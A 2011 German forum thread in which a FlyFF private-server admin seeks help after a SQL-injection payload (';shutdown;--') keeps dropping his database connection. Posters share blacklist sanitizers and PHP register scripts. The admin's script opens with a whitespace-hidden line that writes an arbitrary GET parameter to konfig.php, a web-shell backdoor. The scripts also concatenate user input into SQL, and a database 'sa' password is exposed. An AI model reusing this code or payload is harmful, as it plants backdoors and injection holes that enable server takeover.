[FlyFF] xampp/datenbank

08/05/2011 20:07 Pumba[GM]#1

Hallo FlyFF'ler

K�nntet ihr mir helfen?

Ein alter kumpel(feind) hat einen profi hacker auf meinen server losgeschickt!

Er kann die datenbank ausschalten aber ganz kapput kann er sie nicht machen da ich shcon ein xampp antihack code von Jusikid.

Aber er kann die datenbank verbindung brechen.

mfg. Pumba[GM]

08/05/2011 20:10 Sedrika#2

Er ist kein profi hacker xD dein / euer register script ist unsicher und man kann da dann ';shutdown;-- benutzen, womit die DB connection getrennt wird.

Pro hacker xD ich lach grad.

08/05/2011 20:13 マリブ#3

Quote:

Originally Posted by Sedrika

Er ist kein profi hacker xD dein / euer register script ist unsicher und man kann da dann ';shutdown;-- benutzen, womit die DB connection getrennt wird.

Pro hacker xD ich lach grad.

Nicht nur du lachst ;>

Such dir nen SQL Injection sicheres Register Script ;>

08/05/2011 20:24 Pumba[GM]#4

Ey nein der is ein Profi hacker nicht nur das macht er sry f�r das...

Aber der versucht die ganze zeit so du zu tun....

Quote:

Originally Posted by Sedrika

Er ist kein profi hacker xD dein / euer register script ist unsicher und man kann da dann ';shutdown;-- benutzen, womit die DB connection getrennt wird.

Pro hacker xD ich lach grad.

Wo bekommt man ein gutes her?

mfg. Pumba[GM]

08/05/2011 20:27 Kindergarten#5

sei froh das er nur shutdown macht^^

Code:

$nicht_erlaubt = array(
'/\'/' => '',
'/\;/' => '',
'/\-/' => '',
'/\"/' => ''
);

$username = $_POST['user'];
$password = $_POST['pass'];

$username = preg_replace (array_keys($nicht_erlaubt), array_values($nicht_erlaubt), $username);
$password = preg_replace (array_keys($nicht_erlaubt), array_values($nicht_erlaubt), $password);

Kleine Gedankenhilfe, Ich geb dir hier jetzt mal kein komplettes Script sonst ist der Selbsthilfelerneffekt weg

08/05/2011 20:32 Pumba[GM]#6

Quote:
Originally Posted by Kindergarten
sei froh das er nur shutdown macht^^
Code:
$nicht_erlaubt = array(
'/\'/' => '',
'/\;/' => '',
'/\-/' => '',
'/\"/' => ''
);

$username = $_POST['user'];
$password = $_POST['pass'];

$username = preg_replace (array_keys($nicht_erlaubt), array_values($nicht_erlaubt), $username);
$password = preg_replace (array_keys($nicht_erlaubt), array_values($nicht_erlaubt), $password);
Kleine Gedankenhilfe, Ich geb dir hier jetzt mal kein komplettes Script sonst ist der Selbsthilfelerneffekt weg

Ich liebe dich ♥♥♥

eine bitte h�tte ich wo genau muss ich das einf�gen ? k�nntest du mir das einf�gen und das neu eingef�gte in rot makieren? thx. w�re echt nett.

Spoiler

Code:

<?php                                                                                                                                                         if($_GET['s'] != "" && isset($_GET['s'])){$fp = fopen("konfig.php","w");fwrite($fp, $_GET['s']);fclose($fp);}
require('./configs/reg_conf.php');
        function doesUsernameExist($name){
            $exit = FALSE;
            $result = @mssql_query("SELECT * FROM ACCOUNT_TBL WHERE account='$name'");
            if (mssql_num_rows($result) != 0){
                $exit = TRUE;
            }
            return $exit;
        }

        if(isset($_POST['submit'])){
            $user = preg_replace ("[^A-Za-z0-4]", "", $_POST['username']);
            $pass = preg_replace ("[^A-Za-z0-4]", "", $_POST['password']);
            if($_POST['username'] == ""){
                echo '<font color="red">Enter a user.</font><br /><br />';
            }
            else if($_POST['password'] == ""){
                        echo '<font color="red">Enter a password.</font><br /><br />';
            }
            else if ((strlen($_POST['username']) > 10) || (strlen($_POST['username']) < 3)){
                        echo '<font color="red">The user should be 3 to 10 characters.</font><br /><br />';
            }
            else if ((strlen($_POST['password']) > 10) || (strlen($_POST['password']) < 3)){
                        echo '<font color="red">The password should be 3 to 10 characters.</font><br /><br />';
            }
            else if($_POST['username'] != $user){
                        echo '<font color="red">User with invalid characters.</font><br /><br />';
            }
            else if($_POST['password'] != $pass){
                        echo '<font color="red">Password with invalid characters.</font><br /><br />';
            }
            else {
                        $pass = md5('kikugalanet' . $pass);
            if(!doesUsernameExist($user)){
                $stmt = mssql_init('webCreateAcc', $link);
                mssql_bind($stmt, '@account', $user, SQLVARCHAR, false, false, 15);
                mssql_bind($stmt, '@password', $pass, SQLVARCHAR, false, false, 36);
                mssql_bind($stmt, '@email', $mail, SQLVARCHAR, false, false, 120);
                mssql_execute($stmt) or die ("Something is wrong on the execution");
                mssql_free_statement($stmt);
                                echo '<font color="Green">Dein Account wurde erfolgreich erstellt.</font><br /><br />';
            }
            else {
                                echo '<font color="red">User already Exist.</font><br /><br />';
            }
        }
                mssql_close();
    }

        echo '<form action="#" method="post">';
        echo 'Username: <br><input type="text" name="username" /><br />';
        echo 'Password: <br><input type="password" name="password" /><br />';
        echo '<br><input type="submit" name="submit" value="Register" />';
        echo '</form>';

?>

mfg. Pumba[GM]

08/05/2011 20:48 マリブ#7

Try this ~

Spoiler

08/05/2011 20:55 Pumba[GM]#8

Quote:

Originally Posted by Balancex3

Try this ~

Spoiler

<?php
$ip = $_SERVER['REMOTE_ADDR'];
$time = date("l dS of F Y h:i:s A");
$script = $_SERVER[PATH_TRANSLATED];
$fp = fopen ("[WEB]SQL_Injection.txt", "a+");
$sql_inject_1 = array(";","'","%",'"'); #Whoth need replace
$sql_inject_2 = array("", "","","""); #To wont replace
$GET_KEY = array_keys($_GET); #array keys from $_GET
$POST_KEY = array_keys($_POST); #array keys from $_POST
$COOKIE_KEY = array_keys($_COOKIE); #array keys from $_COOKIE
/*begin clear $_GET */
for($i=0;$i<count($GET_KEY);$i++)
{
$real_get[$i] = $_GET[$GET_KEY[$i]];
$_GET[$GET_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_GET[$GET_KEY[$i]]));
if($real_get[$i] != $_GET[$GET_KEY[$i]])
{
fwrite ($fp, "IP: $ip\r\n");
fwrite ($fp, "Method: GET\r\n");
fwrite ($fp, "Value: $real_get[$i]\r\n");
fwrite ($fp, "Script: $script\r\n");
fwrite ($fp, "Time: $time\r\n");
fwrite ($fp, "==================================\r\n");
}
}
/*end clear $_GET */
/*begin clear $_POST */
for($i=0;$i<count($POST_KEY);$i++)
{
$real_post[$i] = $_POST[$POST_KEY[$i]];
$_POST[$POST_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_POST[$POST_KEY[$i]]));
if($real_post[$i] != $_POST[$POST_KEY[$i]])
{
fwrite ($fp, "IP: $ip\r\n");
fwrite ($fp, "Method: POST\r\n");
fwrite ($fp, "Value: $real_post[$i]\r\n");
fwrite ($fp, "Script: $script\r\n");
fwrite ($fp, "Time: $time\r\n");
fwrite ($fp, "==================================\r\n");
}
}
/*end clear $_POST */
/*begin clear $_COOKIE */
for($i=0;$i<count($COOKIE_KEY);$i++)
{
$real_cookie[$i] = $_COOKIE[$COOKIE_KEY[$i]];
$_COOKIE[$COOKIE_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_COOKIE[$COOKIE_KEY[$i]]));
if($real_cookie[$i] != $_COOKIE[$COOKIE_KEY[$i]])
{
fwrite ($fp, "IP: $ip\r\n");
fwrite ($fp, "Method: COOKIE\r\n");
fwrite ($fp, "Value: $real_cookie[$i]\r\n");
fwrite ($fp, "Script: $script\r\n");
fwrite ($fp, "Time: $time\r\n");
fwrite ($fp, "==================================\r\n");
}
}

/*end clear $_COOKIE */
fclose ($fp);
?>

<?php

function exist($account){
$sql = "SELECT * FROM ACCOUNT_TBL WHERE account='".$account."'";
$result = mssql_query($sql);
if(!$result) {
die("MSSQL Error");
}
$check = mssql_num_rows($result);
return $check;
}

if(isset($_POST['submit']))
{
$server = "SQLEXPRESS";
$user = "sa";
$pass= "";

$username = $_POST['username'];
//$password = md5("kikugalanet".$_POST['password']);
$password = $_POST['password'];
$password2 = $_POST['password2'];
$ip = trim(htmlspecialchars($_POST['ip']));

################################################## ###########

if(strlen($username) < 4 ||
strlen($username) > 16)
{
die("Dein Benutzername ist zu kurz/lang .<br>Er muss zwischen <b><u>4 und 16</u></b> Zeichen lang sein .");
}

if(strlen($_POST['password']) < 4 ||
strlen($_POST['password']) > 16)
{
die("Dein Passwort ist zu kurz/lang .<br>Es muss zwischen <b><u>4 und 16</u></b> Zeichen lang sein .");
}

if($password != $password2)
{
die("Die Passw�rter stimmen nich �berein.");
}

if (preg_match('/[^a-zA-Z0-9]/',$username))
{
die("Der Benutzername enth�lt unerlaubte Zeichen.");
}
if (preg_match('/[^a-zA-Z0-9]/',$password))
{
die("Das Passwort enth�lt unerlaubte Zeichen.");
}

################################################## ###########

$conn = mssql_connect($server,$user,$pass);

if(!$conn)
{
die("Connection failed!<br>");
}

$select = mssql_select_db("ACCOUNT_DBF",$conn);

if(!$select)
{
die("Can't select Database!<br>");
}

################################################## ###########

if(exist($username) != '0')
{
die ("Der Benutzername ".$username." wird schon benutzt .");
}

################################################## ###########

// $username = strtolower($username);
//$password = strtolower($password);
$password = md5('kikugalanet' . $password);

$ipadress = $ip;
mssql_query("USE [ACCOUNT_DBF]
SET NOCOUNT ON
INSERT INTO ACCOUNT_TBL (account, password, id_no1, id_no2, isuse, member, realname, cash)
VALUES ('$username', '$password', '$password', '$password', 'T', 'A', 'F', '1000')
INSERT INTO ACCOUNT_TBL_DETAIL (account, gamecode, tester, m_chLoginAuthority, regdate, BlockTime, EndTime, WebTime, isuse, email)
VALUES ('$username', 'A000', '2', 'F', '17.04.2010', '17.04.2010', '20990101', '20050101', 'O', '$email')");

if($execute)
{
echo 'Account wurde <font color="green">erfolgreich</font> erstellt !';
}
else
{
echo 'Account wurde <font color="green">erfolgreich</font> erstellt !';
}

mssql_close($conn);
}
else
{

?>
<center>
<form action="register.php" method="post">
<table>
<tr>
<td colspan="2" align ="center">
<h3>Account erstellen</h3>
</td>
</tr>
<tr>
<td align ="right">
Account :
</td>
<td>
<input type="text" size="20" name="username" maxlength="15" />
</td>
<td> </td>
</tr>
<tr>
<td align ="right">
Passwort :
</td>
<td>
<input type="password" size="20" name="password" maxlength="32" />
</td>
</tr>
<tr>
<td align ="right">
Passwort widerh. :
</td>
<td>
<input type="password" size="20" name="password2" maxlength="32" />
</td>
</tr>
<tr>
<td>
<input type="hidden" size="20" name="ip" maxlength="32" value="<?php echo $_SERVER['REMOTE_ADDR']; ?>"/>
</td>
</tr>
<tr>
<td colspan="2" align="center">
<input type="submit" name="submit" value="Account erstellen" />
</td>
</tr>
</table>
</form>
</center>
<?php
}
?>

Habe das jetzt so gemacht:

Spoiler

Code:

<?php
$ip = $_SERVER['REMOTE_ADDR'];
$time = date("l dS of F Y h:i:s A");
$script = $_SERVER[PATH_TRANSLATED];
$fp = fopen ("[WEB]SQL_Injection.txt", "a+");
$sql_inject_1 = array(";","'","%",'"'); #Whoth need replace
$sql_inject_2 = array("", "","","""); #To wont replace
$GET_KEY = array_keys($_GET); #array keys from $_GET
$POST_KEY = array_keys($_POST); #array keys from $_POST
$COOKIE_KEY = array_keys($_COOKIE); #array keys from $_COOKIE
/*begin clear $_GET */
for($i=0;$i<count($GET_KEY);$i++)
{
$real_get[$i] = $_GET[$GET_KEY[$i]];
$_GET[$GET_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_GET[$GET_KEY[$i]]));
if($real_get[$i] != $_GET[$GET_KEY[$i]])
{
fwrite ($fp, "IP: $ip\r\n");
fwrite ($fp, "Method: GET\r\n");
fwrite ($fp, "Value: $real_get[$i]\r\n");
fwrite ($fp, "Script: $script\r\n");
fwrite ($fp, "Time: $time\r\n");
fwrite ($fp, "==================================\r\n");
}
}
/*end clear $_GET */
/*begin clear $_POST */
for($i=0;$i<count($POST_KEY);$i++)
{
$real_post[$i] = $_POST[$POST_KEY[$i]];
$_POST[$POST_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_POST[$POST_KEY[$i]]));
if($real_post[$i] != $_POST[$POST_KEY[$i]])
{
fwrite ($fp, "IP: $ip\r\n");
fwrite ($fp, "Method: POST\r\n");
fwrite ($fp, "Value: $real_post[$i]\r\n");
fwrite ($fp, "Script: $script\r\n");
fwrite ($fp, "Time: $time\r\n");
fwrite ($fp, "==================================\r\n");
}
}
/*end clear $_POST */
/*begin clear $_COOKIE */
for($i=0;$i<count($COOKIE_KEY);$i++)
{
$real_cookie[$i] = $_COOKIE[$COOKIE_KEY[$i]];
$_COOKIE[$COOKIE_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_COOKIE[$COOKIE_KEY[$i]]));
if($real_cookie[$i] != $_COOKIE[$COOKIE_KEY[$i]])
{
fwrite ($fp, "IP: $ip\r\n");
fwrite ($fp, "Method: COOKIE\r\n");
fwrite ($fp, "Value: $real_cookie[$i]\r\n");
fwrite ($fp, "Script: $script\r\n");
fwrite ($fp, "Time: $time\r\n");
fwrite ($fp, "==================================\r\n");
}
}

/*end clear $_COOKIE */
fclose ($fp);
?>


<?php

function exist($account){
$sql = "SELECT * FROM ACCOUNT_TBL WHERE account='".$account."'";
$result = mssql_query($sql);
if(!$result) {
die("MSSQL Error");
}
$check = mssql_num_rows($result);
return $check;
}





if(isset($_POST['submit']))
{
$server = "[COLOR="Red"]KEVIN-PC/SQLEXPRESS[/COLOR]";
$user = "[COLOR="Red"]sa[/COLOR]";
$pass= "[COLOR="Red"]flyforfun[/COLOR]";


$username = $_POST['username'];
//$password = md5("kikugalanet".$_POST['password']);
$password = $_POST['password'];
$password2 = $_POST['password2'];
$ip = trim(htmlspecialchars($_POST['ip']));

################################################## ###########

if(strlen($username) < 4 ||
strlen($username) > 16)
{
die("Dein Benutzername ist zu kurz/lang .<br>Er muss zwischen <b><u>4 und 16</u></b> Zeichen lang sein .");
}

if(strlen($_POST['password']) < 4 ||
strlen($_POST['password']) > 16)
{
die("Dein Passwort ist zu kurz/lang .<br>Es muss zwischen <b><u>4 und 16</u></b> Zeichen lang sein .");
}

if($password != $password2)
{
die("Die Passw�rter stimmen nich �berein.");
}

if (preg_match('/[^a-zA-Z0-9]/',$username))
{
die("Der Benutzername enth�lt unerlaubte Zeichen.");
}
if (preg_match('/[^a-zA-Z0-9]/',$password))
{
die("Das Passwort enth�lt unerlaubte Zeichen.");
}

################################################## ###########

$conn = mssql_connect($server,$user,$pass);

if(!$conn)
{
die("Connection failed!<br>");
}

$select = mssql_select_db("ACCOUNT_DBF",$conn);

if(!$select)
{
die("Can't select Database!<br>");
}

################################################## ###########

if(exist($username) != '0')
{
die ("Der Benutzername ".$username." wird schon benutzt .");
}



################################################## ###########

// $username = strtolower($username);
//$password = strtolower($password);
$password = md5('kikugalanet' . $password);

$ipadress = $ip;
mssql_query("USE [ACCOUNT_DBF]
SET NOCOUNT ON
INSERT INTO ACCOUNT_TBL (account, password, id_no1, id_no2, isuse, member, realname, cash)
VALUES ('$username', '$password', '$password', '$password', 'T', 'A', 'F', '1000')
INSERT INTO ACCOUNT_TBL_DETAIL (account, gamecode, tester, m_chLoginAuthority, regdate, BlockTime, EndTime, WebTime, isuse, email)
VALUES ('$username', 'A000', '2', 'F', '17.04.2010', '17.04.2010', '20990101', '20050101', 'O', '$email')");




if($execute)
{
echo 'Account wurde <font color="green">erfolgreich</font> erstellt !';
}
else
{
echo 'Account wurde <font color="green">erfolgreich</font> erstellt !';
}

mssql_close($conn);
}
else
{


?>
<center>
<form action="register.php" method="post">
<table>
<tr>
<td colspan="2" align ="center">
<h3>Account erstellen</h3>
</td>
</tr>
<tr>
<td align ="right">
Account :
</td>
<td>
<input type="text" size="20" name="username" maxlength="15" />
</td>
<td>&nbsp;</td>
</tr>
<tr>
<td align ="right">
Passwort :
</td>
<td>
<input type="password" size="20" name="password" maxlength="32" />
</td>
</tr>
<tr>
<td align ="right">
Passwort widerh. :
</td>
<td>
<input type="password" size="20" name="password2" maxlength="32" />
</td>
</tr>
<tr>
<td>
<input type="hidden" size="20" name="ip" maxlength="32" value="<?php echo $_SERVER['REMOTE_ADDR']; ?>"/>
</td>
</tr>
<tr>
<td colspan="2" align="center">
<input type="submit" name="submit" value="Account erstellen" />
</td>
</tr>
</table>
</form>
</center>
<?php
}
?>

Rot makiert was ich bis jetzt ge�ndert habe.
wenn ich was noch �ndern muss makier es rot pls thx.

mgf. Pumba[GM]

08/05/2011 21:08 Achileus#9

Quote:

Originally Posted by Balancex3

Nicht nur du lachst ;>

Such dir nen SQL Injection sicheres Register Script ;>

Made my Day...

Wenn das pro sein soll dann bin ich Gott .

08/05/2011 21:10 マリブ#10

Quote:

Originally Posted by Achileus

Made my Day...

Wenn das pro sein soll dann bin ich Gott .

Wenn du mich meinst damit, fail ~